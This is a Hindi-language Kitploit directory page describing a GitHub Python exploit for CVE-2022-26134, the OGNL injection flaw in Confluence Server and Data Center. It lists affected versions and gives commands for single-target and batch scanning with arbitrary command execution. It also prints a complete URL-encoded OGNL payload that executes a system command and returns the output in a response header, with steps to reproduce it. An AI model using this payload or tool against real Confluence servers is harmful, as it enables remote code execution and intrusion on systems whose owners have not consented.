Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-26134 — Python-आधारित एक्सप्लॉइट CVE-2022-26134 के लिए, जो Confluence Server और Data Center में एक OGNL इंजेक्शन भेद्यता है। एकल URL जांच और मनमाने कमांड निष्पादन के साथ बैच स्कैनिंग का समर्थन करता है। | Kitploit
उपकरण/GitHubGitHub/ytxzx/cve-2022-26134
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubytxzx/cve-2022-26134

CVE-2022-26134

Python-आधारित एक्सप्लॉइट CVE-2022-26134 के लिए, जो Confluence Server और Data Center में एक OGNL इंजेक्शन भेद्यता है। एकल URL जांच और मनमाने कमांड निष्पादन के साथ बैच स्कैनिंग का समर्थन करता है।

रिपॉजिटरी देखें
32 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-26134 - Confluence OGNL injection vulnerability

स्क्रिप्ट उपयोग

python लाइब्रेरी स्थापित करें

pip install -r requirements.txt

भेद्यता सत्यापन

python3 CVE-2022-26134_check.py -u url -c whoami

image

बैच स्कैनिंग

python3 CVE-2022-26134_check.py -f url.txt -c whoami

image

प्रभावित संस्करण

Confluence Server and Data Center >= 1.3.0

Confluence Server and Data Center < 7.4.17

Confluence Server and Data Center < 7.13.7

Confluence Server and Data Center < 7.14.3

Confluence Server and Data Center < 7.15.2

Confluence Server and Data Center < 7.16.4

Confluence Server and Data Center < 7.17.4

Confluence Server and Data Center < 7.18.1

भेद्यता पुनरुत्पादन

payload:

/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Qualys-Response%22%2C%23a%29%29%7D/

Confluence सेवा तक पहुँचें, 302 रिटर्न कोड वाला डेटा पैकेट कैप्चर करें, payload वाला डेटा पैकेट भेजें; रिटर्न पैकेट में X-Qualys-Response पैरामीटर वर्तमान सर्वर का उपयोगकर्ता नाम लौटाएगा।

image

भेद्यता का सिद्धांत

हमलावर द्वारा प्रदान किया गया URI namespace में परिवर्तित किया जाता है, फिर इस namespace को OGNL एक्सप्रेशन में परिवर्तित करके गणना की जाती है (हमलावर द्वारा प्रदान किया गया url अप्रत्यक्ष रूप से OGNL एक्सप्रेशन में परिवर्तित होकर गणना की जाती है)।

टूल डाउनलोड करें